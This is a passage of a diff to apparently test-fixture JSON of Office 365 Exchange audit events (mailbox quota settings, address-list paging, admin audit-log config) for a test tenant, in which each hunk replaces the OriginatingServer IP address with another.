bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"f580aae6-d0d5-4204-1a13-08d7ac0f2a03\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -4734,7 +4734,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -4808,7 +4808,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -4820,7 +4820,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -4894,7 +4894,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"2db154f6-63ae-4a31-c548-08d7adfc0d1d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"2db154f6-63ae-4a31-c548-08d7adfc0d1d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -4906,7 +4906,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -4980,7 +4980,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -4992,7 +4992,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -5066,7 +5066,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -5078,7 +5078,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", @@ -5152,7 +5152,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -5164,7 +5164,7 @@ "Operation": "Enable-AddressListPaging", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DoNotUpdateRecipients", @@ -5190,7 +5190,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -5202,7 +5202,7 @@ "Operation": "Set-AdminAuditLogConfig", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", @@ -5232,7 +5232,7 @@ }, { "event": { - "original": 